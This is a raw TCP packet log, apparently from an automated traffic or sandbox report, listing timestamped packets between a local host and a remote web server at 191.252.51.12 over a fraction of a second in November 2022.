                                                  Nov 30, 2022 00:37:14.824269056 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824294090 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824320078 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824323893 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824323893 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824345112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824352026 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824373007 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824397087 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824402094 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824445963 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824471951 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824471951 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824498892 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824523926 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824523926 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824548960 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824572086 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824584007 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824599028 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824625015 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824626923 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824650049 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824675083 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824692965 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824702024 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824728966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824731112 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824754953 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824769974 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824780941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824806929 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824831009 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824837923 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824856043 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824879885 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824882030 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824902058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824927092 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824950933 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824954033 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.824976921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.824984074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825002909 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825025082 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825027943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825052977 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825083017 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825094938 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825109005 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825134993 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825134993 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825161934 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825186968 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825193882 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825212002 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825237036 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825262070 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825270891 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825288057 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825314045 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825329065 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825339079 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825361013 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825372934 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825380087 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825400114 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825423956 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825448036 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825457096 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825473070 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825498104 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825500965 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825521946 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825547934 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825547934 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825572014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825597048 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825601101 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825623035 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825640917 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825649023 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825674057 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825700045 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825706959 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825726032 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825750113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825756073 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825773954 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825792074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825799942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825824976 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825846910 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825848103 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825870991 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825895071 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825917959 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825917959 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825944901 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825946093 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825970888 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.825985909 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.825995922 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826029062 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826051950 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826054096 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826080084 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826102972 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826105118 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826132059 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826148987 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826155901 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826181889 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826205969 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826206923 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826236010 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826258898 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826282978 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826283932 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826308012 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.826319933 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.826364994 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.827137947 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.849385023 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.849436045 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.849453926 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.849473000 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.849558115 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.849663973 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.876445055 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.876473904 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.876490116 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.876509905 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:14.876552105 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:14.876602888 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.039581060 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039647102 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039691925 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039737940 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039763927 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.039778948 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039825916 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039830923 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.039870024 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039912939 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039931059 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.039958000 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.039966106 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040002108 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040046930 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040057898 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040091991 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040134907 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040179014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040190935 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040221930 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040232897 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040266037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040307999 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040318966 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040350914 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040394068 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040436029 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040472031 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040481091 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040513992 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040525913 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040569067 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040582895 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040611029 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040654898 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040668964 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040698051 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040743113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040760040 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040785074 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040827990 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040869951 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040891886 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040915012 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040956974 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.040956974 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.040998936 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041011095 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041042089 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041083097 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041124105 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041167021 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041172028 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041212082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041212082 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041253090 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041273117 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041296005 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041338921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041358948 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041379929 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041421890 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041440010 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041465044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041507006 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041548014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041560888 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041589975 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041632891 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041673899 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041685104 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041706085 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041716099 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041759014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041794062 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041800976 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041845083 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041857958 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041896105 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041939020 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.041975975 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.041981936 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042026043 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042047024 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042068958 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042112112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042140007 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042155027 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042197943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042210102 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042243004 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042284966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042327881 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042326927 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042371035 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042412043 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042453051 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042454004 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042479992 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042498112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042541027 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042557955 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042586088 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042628050 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042661905 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042671919 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042715073 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042726994 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042759895 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042802095 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042823076 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042844057 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042901993 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.042908907 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042954922 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.042999029 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043040991 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043055058 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.043085098 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043096066 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.043128967 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043169975 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043181896 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.043214083 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043256044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043299913 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043313980 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.043344021 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043353081 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.043387890 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.043504953 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.045178890 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.062674999 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.062750101 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.062793016 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.062835932 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.062892914 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.062973976 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.089519978 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089566946 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089608908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089639902 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.089651108 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089694023 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089704990 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.089740992 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.089868069 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.256542921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256608963 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256658077 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256701946 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256712914 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.256752014 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256797075 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256808996 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.256841898 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256864071 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.256886005 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256928921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256972075 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.256987095 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257015944 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257059097 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257074118 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257105112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257114887 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257148981 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257194042 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257215023 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257237911 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257278919 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257297039 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257322073 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257365942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257409096 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257422924 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257456064 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257498026 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257513046 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257543087 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257560968 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257586956 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257627964 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257661104 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257698059 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257704020 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257730961 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257747889 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257791042 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257832050 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257848978 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257874966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257920027 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257929087 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.257963896 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.257972002 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.258008957 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.258050919 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.258066893 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.258094072 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.258137941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.258152008 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:15.258181095 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:15.258222103 CET8049699191.252.51.12192.168.2.3
